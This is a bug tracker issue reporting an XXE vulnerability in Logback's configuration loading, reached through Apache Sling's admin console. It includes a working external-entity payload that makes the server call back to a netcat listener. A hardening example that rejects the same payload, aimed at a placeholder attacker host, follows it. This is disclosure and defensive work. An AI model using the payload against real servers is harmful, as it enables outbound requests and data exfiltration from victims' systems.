Details

    • Type: Bug
    • Status: Open
    • Priority: Critical
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: 1.3.0-alpha6
    • Component/s: logback-core
    • Labels:
    • Environment: I tested the latest Apache Sling version 11 integrating Logback, running on a Windows system.

Description

Hi, I found an XXE vulnerability in Logback when testing the latest Apache Sling version 11 integrating Logback.

First I log in to Sling as an admin.
The vulnerable URL is http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager.
In the "Logback Config File" field, I input "\\192.168.0.102\c$\xxe.xml" as shown below.

The content of xxe.xml in the c:\ directory on the server 192.168.0.102 is

<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % sp SYSTEM "http://192.168.0.102:8090/sling">%sp;]>

After clicking "save", the netcat instance running on the server 192.168.0.102 and listening on port 8090 receives the request as shown below.

       
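The report shows a configuration file whose DOCTYPE declares an external parameter entity, which a default-configured parser resolves eagerly and thereby contacts the attacker-controlled host. The following is an added example, not logback's own code, of a javax.xml.parsers.SAXParserFactory configured so that such a document is rejected before any external resource is fetched; the payload is constructed to mirror the report's DOCTYPE, with the host name replaced by a placeholder.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;
import java.io.StringReader;

public class XxeHardening {
    // Constructed sample with the same shape as the DOCTYPE in the report; the host is a
    // placeholder so the document cannot reach anything even if parsed unsafely.
    static final String PAYLOAD =
        "<?xml version=\"1.0\"?>"
        + "<!DOCTYPE r [<!ENTITY % sp SYSTEM \"http://attacker.example/sling\">%sp;]>"
        + "<r/>";

    static SAXParser newHardenedParser() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        // Refuse any DOCTYPE: without a DTD there are no parameter entities to resolve.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth should a DOCTYPE ever be allowed: never load external entities or DTDs.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        SAXParser p = f.newSAXParser();
        // Empty protocol allow-lists: no scheme may be used to fetch external DTDs or schemas.
        p.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        p.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return p;
    }

    /** Returns true when the hardened parser rejects the document (a SAXException is raised). */
    static boolean rejects(String xml) throws Exception {
        try {
            newHardenedParser().parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return false;
        } catch (SAXException e) {
            return true; // expected: "DOCTYPE is disallowed" before any network access
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("hardened parser rejected payload: " + rejects(PAYLOAD));
    }
}
```

A parser created from an unmodified SAXParserFactory would instead attempt to fetch the entity's SYSTEM URL while parsing, which is the outbound request the reporter observes on the netcat listener.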


People

    • Assignee: logback-dev Logback dev list
    • Reporter: shuiboye shuiboye
    • Votes: 0
    • Watchers: 3